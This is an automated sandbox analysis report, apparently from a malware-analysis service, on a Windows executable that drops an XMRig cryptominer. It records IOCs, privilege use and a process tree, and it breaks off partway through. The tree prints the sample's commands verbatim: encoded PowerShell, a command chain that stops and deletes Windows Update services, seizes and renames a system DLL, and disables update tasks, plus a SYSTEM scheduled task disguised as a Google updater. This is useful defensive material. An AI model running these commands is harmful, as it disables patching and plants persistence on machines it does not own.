General

Target: a4b172b6d8cea90214cccec4a531c881b5bad6b641370e838a09422a183f7301.exe
Filesize: 7MB
Completed: 16-05-2022 00:56
Task: behavioral2
Score: 10/10
MD5: 95104aa61ed30687c13e5c644d5722f3
SHA1: f9788f808044d448f73203d93da0021cefb781ff
SHA256: a4b172b6d8cea90214cccec4a531c881b5bad6b641370e838a09422a183f7301
SHA512: 99dcd2463ad6c56eaeedbdd96c8ff0564aadb27b14f0ce047397e8791f1d886d07d104d76908e2ed7e3918c35ca52e643c1d02ed8bde16c76d18dc40b9b66bce

Malware Config

Signatures 18

Tactics: Defense Evasion, Impact, Persistence
  • Modifies security service
    reg.exe

    TTPs

    Modify Registry, Modify Existing Service

    Reported IOCs

    description | ioc | process
    Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security | reg.exe
    Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0 | reg.exe
    Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1 | reg.exe
    Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo | reg.exe
    Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters | reg.exe
  • xmrig

    Description

    XMRig is a high performance, open source, cross platform CPU/GPU miner.
  • XMRig Miner Payload

    Reported IOCs

    resource | yara_rule
    behavioral2/memory/4544-380-0x0000000140000000-0x0000000140803000-memory.dmp | xmrig
    behavioral2/memory/4544-381-0x000000014036DB84-mapping.dmp | xmrig
    behavioral2/memory/4544-382-0x0000000140000000-0x0000000140803000-memory.dmp | xmrig
    behavioral2/memory/4544-383-0x0000000140000000-0x0000000140803000-memory.dmp | xmrig
    behavioral2/memory/4544-397-0x0000000140000000-0x0000000140803000-memory.dmp | xmrig
  • Executes dropped EXE
    services.exe

    Reported IOCs

    pid | process
    3472 | services.exe
  • Possible privilege escalation attempt
    takeown.exe, icacls.exe, takeown.exe, icacls.exe

    Reported IOCs

    pid | process
    4560 | takeown.exe
    4516 | icacls.exe
    4956 | takeown.exe
    4968 | icacls.exe
  • Stops running service(s)

    TTPs

    Modify Existing Service, Service Stop
  • Modifies file permissions
    takeown.exe, icacls.exe, takeown.exe, icacls.exe

    TTPs

    File Permissions Modification

    Reported IOCs

    pid | process
    4560 | takeown.exe
    4516 | icacls.exe
    4956 | takeown.exe
    4968 | icacls.exe
  • Drops file in System32 directory
    powershell.exe, conhost.exe

    Reported IOCs

    description | ioc | process
    File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | powershell.exe
    File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log | powershell.exe
    File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\conhost.exe.log | conhost.exe
  • Suspicious use of SetThreadContext
    conhost.exe

    Reported IOCs

    description | pid | process | target process
    PID 4216 set thread context of 2128 | 4216 | conhost.exe | conhost.exe
    PID 4216 set thread context of 4544 | 4216 | conhost.exe | svchost.exe
  • Drops file in Program Files directory
    conhost.exe, conhost.exe

    Reported IOCs

    description | ioc | process
    File created | C:\Program Files\Google\Libs\WR64.sys | conhost.exe
    File created | C:\Program Files\Windows\services.exe | conhost.exe
    File opened for modification | C:\Program Files\Windows\services.exe | conhost.exe
  • Launches sc.exe

    Description

    Sc.exe is a Windows utility to control services on the system.

  • Creates scheduled task(s)
    schtasks.exe

    Description

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    TTPs

    Scheduled Task

    Reported IOCs

    pid | process
    4940 | schtasks.exe
  • Modifies data under HKEY_USERS
    conhost.exe, powershell.exe

    Reported IOCs

    description | ioc | process
    Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | conhost.exe
    Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | powershell.exe
    Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | powershell.exe
    Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | powershell.exe
    Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | powershell.exe
    Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | powershell.exe
    Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | powershell.exe
    Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | powershell.exe
    Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | conhost.exe
    Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | conhost.exe
    Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | powershell.exe
    Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | powershell.exe
    Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | powershell.exe
    Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | powershell.exe
    Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | powershell.exe
    Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | powershell.exe
    Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | powershell.exe
    Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | powershell.exe
    Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | powershell.exe
    Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | conhost.exe
    Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | powershell.exe
    Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | powershell.exe
    Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | powershell.exe
    Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | powershell.exe
    Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | powershell.exe
    Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | conhost.exe
    Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | powershell.exe
    Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | powershell.exe
    Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | powershell.exe
    Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 | powershell.exe
    Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | powershell.exe
    Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | powershell.exe
    Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | powershell.exe
    Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | powershell.exe
    Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | powershell.exe
    Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | powershell.exe
    Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | powershell.exe
    Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | powershell.exe
    Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | powershell.exe
    Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | powershell.exe
    Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | powershell.exe
    Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | powershell.exe
    Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | powershell.exe
    Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | powershell.exe
    Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | powershell.exe
    Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | powershell.exe
    Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | powershell.exe
    Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | powershell.exe
    Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | powershell.exe
    Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | powershell.exe
    Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | powershell.exe
    Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | powershell.exe
  • Modifies registry key
    reg.exe (18 instances)

    TTPs

    Modify Registry

    Reported IOCs

    pid | process
    4708 | reg.exe
    1336 | reg.exe
    4424 | reg.exe
    4856 | reg.exe
    4264 | reg.exe
    3644 | reg.exe
    4412 | reg.exe
    4912 | reg.exe
    4932 | reg.exe
    4576 | reg.exe
    4340 | reg.exe
    5004 | reg.exe
    1536 | reg.exe
    4988 | reg.exe
    5024 | reg.exe
    1956 | reg.exe
    2884 | reg.exe
    1820 | reg.exe
  • Suspicious behavior: EnumeratesProcesses
    powershell.exe, conhost.exe, powershell.exe, conhost.exe, svchost.exe

    Reported IOCs

    pid | process | occurrences
    1676 | powershell.exe | 3
    2456 | conhost.exe | 1
    532 | powershell.exe | 3
    4216 | conhost.exe | 1
    4544 | svchost.exe | 56
  • Suspicious behavior: LoadsDriver

    Reported IOCs

    pid | process
    640 |
  • Suspicious use of AdjustPrivilegeToken
    powershell.exe, conhost.exe, takeown.exe, powershell.exe, conhost.exe, takeown.exe, svchost.exe

    Reported IOCs

    description | pid | process
    Token: SeDebugPrivilege | 1676 | powershell.exe
    Token: SeIncreaseQuotaPrivilege | 1676 | powershell.exe
    Token: SeSecurityPrivilege | 1676 | powershell.exe
    Token: SeTakeOwnershipPrivilege | 1676 | powershell.exe
    Token: SeLoadDriverPrivilege | 1676 | powershell.exe
    Token: SeSystemProfilePrivilege | 1676 | powershell.exe
    Token: SeSystemtimePrivilege | 1676 | powershell.exe
    Token: SeProfSingleProcessPrivilege | 1676 | powershell.exe
    Token: SeIncBasePriorityPrivilege | 1676 | powershell.exe
    Token: SeCreatePagefilePrivilege | 1676 | powershell.exe
    Token: SeBackupPrivilege | 1676 | powershell.exe
    Token: SeRestorePrivilege | 1676 | powershell.exe
    Token: SeShutdownPrivilege | 1676 | powershell.exe
    Token: SeDebugPrivilege | 1676 | powershell.exe
    Token: SeSystemEnvironmentPrivilege | 1676 | powershell.exe
    Token: SeRemoteShutdownPrivilege | 1676 | powershell.exe
    Token: SeUndockPrivilege | 1676 | powershell.exe
    Token: SeManageVolumePrivilege | 1676 | powershell.exe
    Token: 33 | 1676 | powershell.exe
    Token: 34 | 1676 | powershell.exe
    Token: 35 | 1676 | powershell.exe
    Token: 36 | 1676 | powershell.exe
    Token: SeDebugPrivilege | 2456 | conhost.exe
    Token: SeTakeOwnershipPrivilege | 4956 | takeown.exe
    Token: SeDebugPrivilege | 532 | powershell.exe
    Token: SeAssignPrimaryTokenPrivilege | 532 | powershell.exe
    Token: SeIncreaseQuotaPrivilege | 532 | powershell.exe
    Token: SeSecurityPrivilege | 532 | powershell.exe
    Token: SeTakeOwnershipPrivilege | 532 | powershell.exe
    Token: SeLoadDriverPrivilege | 532 | powershell.exe
    Token: SeSystemtimePrivilege | 532 | powershell.exe
    Token: SeBackupPrivilege | 532 | powershell.exe
    Token: SeRestorePrivilege | 532 | powershell.exe
    Token: SeShutdownPrivilege | 532 | powershell.exe
    Token: SeSystemEnvironmentPrivilege | 532 | powershell.exe
    Token: SeUndockPrivilege | 532 | powershell.exe
    Token: SeManageVolumePrivilege | 532 | powershell.exe
    Token: SeDebugPrivilege | 4216 | conhost.exe
    Token: SeTakeOwnershipPrivilege | 4560 | takeown.exe
    Token: SeLockMemoryPrivilege | 4544 | svchost.exe
    Token: SeLockMemoryPrivilege | 4544 | svchost.exe
  • Suspicious use of WriteProcessMemory
    a4b172b6d8cea90214cccec4a531c881b5bad6b641370e838a09422a183f7301.exe, conhost.exe, cmd.exe, cmd.exe, cmd.exe, cmd.exe, services.exe

    Reported IOCs

    description | pid | process | target process | occurrences
    PID 2300 wrote to memory of 2456 | 2300 | a4b172b6d8cea90214cccec4a531c881b5bad6b641370e838a09422a183f7301.exe | conhost.exe | 3
    PID 2456 wrote to memory of 3740 | 2456 | conhost.exe | cmd.exe | 2
    PID 3740 wrote to memory of 1676 | 3740 | cmd.exe | powershell.exe | 2
    PID 2456 wrote to memory of 1340 | 2456 | conhost.exe | cmd.exe | 2
    PID 1340 wrote to memory of 4496 | 1340 | cmd.exe | sc.exe | 2
    PID 1340 wrote to memory of 2716 | 1340 | cmd.exe | sc.exe | 2
    PID 1340 wrote to memory of 4700 | 1340 | cmd.exe | sc.exe | 2
    PID 1340 wrote to memory of 1540 | 1340 | cmd.exe | sc.exe | 2
    PID 1340 wrote to memory of 4384 | 1340 | cmd.exe | sc.exe | 2
    PID 1340 wrote to memory of 4856 | 1340 | cmd.exe | reg.exe | 2
    PID 1340 wrote to memory of 4708 | 1340 | cmd.exe | reg.exe | 2
    PID 2456 wrote to memory of 4732 | 2456 | conhost.exe | cmd.exe | 2
    PID 1340 wrote to memory of 4912 | 1340 | cmd.exe | reg.exe | 2
    PID 1340 wrote to memory of 4932 | 1340 | cmd.exe | reg.exe | 2
    PID 4732 wrote to memory of 4940 | 4732 | cmd.exe | schtasks.exe | 2
    PID 1340 wrote to memory of 4576 | 1340 | cmd.exe | reg.exe | 2
    PID 1340 wrote to memory of 4956 | 1340 | cmd.exe | takeown.exe | 2
    PID 1340 wrote to memory of 4968 | 1340 | cmd.exe | icacls.exe | 2
    PID 1340 wrote to memory of 4340 | 1340 | cmd.exe | reg.exe | 2
    PID 1340 wrote to memory of 4988 | 1340 | cmd.exe | reg.exe | 2
    PID 1340 wrote to memory of 5004 | 1340 | cmd.exe | reg.exe | 2
    PID 1340 wrote to memory of 5024 | 1340 | cmd.exe | reg.exe | 2
    PID 1340 wrote to memory of 5064 | 1340 | cmd.exe | schtasks.exe | 2
    PID 1340 wrote to memory of 5100 | 1340 | cmd.exe | schtasks.exe | 2
    PID 1340 wrote to memory of 1860 | 1340 | cmd.exe | schtasks.exe | 2
    PID 1340 wrote to memory of 2744 | 1340 | cmd.exe | schtasks.exe | 2
    PID 1340 wrote to memory of 2724 | 1340 | cmd.exe | schtasks.exe | 2
    PID 1340 wrote to memory of 5112 | 1340 | cmd.exe | schtasks.exe | 2
    PID 1340 wrote to memory of 1388 | 1340 | cmd.exe | schtasks.exe | 2
    PID 2456 wrote to memory of 3236 | 2456 | conhost.exe | cmd.exe | 2
    PID 3236 wrote to memory of 3312 | 3236 | cmd.exe | schtasks.exe | 2
    PID 3472 wrote to memory of 4216 | 3472 | services.exe | conhost.exe | 1
Processes 63
  • C:\Users\Admin\AppData\Local\Temp\a4b172b6d8cea90214cccec4a531c881b5bad6b641370e838a09422a183f7301.exe
    "C:\Users\Admin\AppData\Local\Temp\a4b172b6d8cea90214cccec4a531c881b5bad6b641370e838a09422a183f7301.exe"
    Suspicious use of WriteProcessMemory
    PID:2300
    • C:\Windows\System32\conhost.exe
      "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\a4b172b6d8cea90214cccec4a531c881b5bad6b641370e838a09422a183f7301.exe"
      Drops file in Program Files directory
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2456
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAGUAYQB1AGMAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBkAGgAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQByAG8AIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAYQBqAGYAYQAjAD4A"
        Suspicious use of WriteProcessMemory
        PID:3740
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -EncodedCommand "PAAjAGUAYQB1AGMAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBkAGgAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQByAG8AIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAYQBqAGYAYQAjAD4A"
          Suspicious behavior: EnumeratesProcesses
          Suspicious use of AdjustPrivilegeToken
          PID:1676
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
        Suspicious use of WriteProcessMemory
        PID:1340
        • C:\Windows\system32\sc.exe
          sc stop UsoSvc
          PID:4496
        • C:\Windows\system32\sc.exe
          sc stop WaaSMedicSvc
          PID:2716
        • C:\Windows\system32\sc.exe
          sc stop wuauserv
          PID:4700
        • C:\Windows\system32\sc.exe
          sc stop bits
          PID:1540
        • C:\Windows\system32\sc.exe
          sc stop dosvc
          PID:4384
        • C:\Windows\system32\reg.exe
          reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
          Modifies registry key
          PID:4856
        • C:\Windows\system32\reg.exe
          reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
          Modifies registry key
          PID:4708
        • C:\Windows\system32\reg.exe
          reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
          Modifies security service
          Modifies registry key
          PID:4912
        • C:\Windows\system32\reg.exe
          reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
          Modifies registry key
          PID:4932
        • C:\Windows\system32\reg.exe
          reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
          Modifies registry key
          PID:4576
        • C:\Windows\system32\takeown.exe
          takeown /f C:\Windows\System32\WaaSMedicSvc.dll
          Possible privilege escalation attempt
          Modifies file permissions
          Suspicious use of AdjustPrivilegeToken
          PID:4956
        • C:\Windows\system32\icacls.exe
          icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
          Possible privilege escalation attempt
          Modifies file permissions
          PID:4968
        • C:\Windows\system32\reg.exe
          reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
          Modifies registry key
          PID:4340
        • C:\Windows\system32\reg.exe
          reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
          Modifies registry key
          PID:4988
        • C:\Windows\system32\reg.exe
          reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
          Modifies registry key
          PID:5004
        • C:\Windows\system32\reg.exe
          reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
          Modifies registry key
          PID:5024
        • C:\Windows\system32\schtasks.exe
          SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
          PID:5064
        • C:\Windows\system32\schtasks.exe
          SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
          PID:5100
        • C:\Windows\system32\schtasks.exe
          SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
          PID:1860
        • C:\Windows\system32\schtasks.exe
          SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
          PID:2744
        • C:\Windows\system32\schtasks.exe
          SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
          PID:2724
        • C:\Windows\system32\schtasks.exe
          SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
          PID:5112
        • C:\Windows\system32\schtasks.exe
          SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
          PID:1388
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" cmd /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "C:\Program Files\Windows\services.exe"
        Suspicious use of WriteProcessMemory
        PID:4732
        • C:\Windows\system32\schtasks.exe
          schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "C:\Program Files\Windows\services.exe"
          Creates scheduled task(s)
          PID:4940
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" cmd /c schtasks /run /tn "GoogleUpdateTaskMachineQC"
        Suspicious use of WriteProcessMemory
        PID:3236
        • C:\Windows\system32\schtasks.exe
          schtasks /run /tn "GoogleUpdateTaskMachineQC"
          PID:3312
  • C:\Program Files\Windows\services.exe
    "C:\Program Files\Windows\services.exe"
    Executes dropped EXE
    Suspicious use of WriteProcessMemory
    PID:3472
    • C:\Windows\System32\conhost.exe
      "C:\Windows\System32\conhost.exe" "C:\Program Files\Windows\services.exe"
      Drops file in System32 directory
      Suspicious use of SetThreadContext
      Drops file in Program Files directory
      Modifies data under HKEY_USERS
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4216
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAGUAYQB1AGMAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBkAGgAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQByAG8AIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAYQBqAGYAYQAjAD4A"
        PID:3992
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -EncodedCommand "PAAjAGUAYQB1AGMAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBkAGgAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQByAG8AIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAYQBqAGYAYQAjAD4A"
          Drops file in System32 directory
          Modifies data under HKEY_USERS
          Suspicious behavior: EnumeratesProcesses
          Suspicious use of AdjustPrivilegeToken
          PID:532
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
        PID:4320
        • C:\Windows\system32\sc.exe
          sc stop UsoSvc
          PID:4408
        • C:\Windows\system32\sc.exe
          sc stop WaaSMedicSvc
          PID:4748
        • C:\Windows\system32\sc.exe
          sc stop wuauserv
          PID:4744
        • C:\Windows\system32\sc.exe
          sc stop bits
          PID:4108
        • C:\Windows\system32\sc.exe
          sc stop dosvc
          PID:4112
        • C:\Windows\system32\reg.exe
          reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
          Modifies registry key
          PID:4264
        • C:\Windows\system32\reg.exe
          reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
